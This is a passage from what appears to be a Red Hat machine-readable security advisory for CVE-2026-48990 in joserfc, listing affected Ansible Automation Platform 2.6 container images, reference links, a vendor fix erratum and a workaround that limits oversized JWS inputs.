"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48990"
},
{
"category": "external",
"summary": "RHBZ#2490168",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490168"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990"
},
{
"category": "external",
"summary": "https://github.com/authlib/joserfc/releases/tag/1.6.7",
"url": "https://github.com/authlib/joserfc/releases/tag/1.6.7"
},
{
"category": "external",
"summary": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5",
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
}
],
"release_date": "2026-06-17T21:08:10.534000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "The risk can be mitigated by rejecting oversized serialized JWS inputs before they reach joserfc and enforcing strict request/body size limits at the application or reverse-proxy layer.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
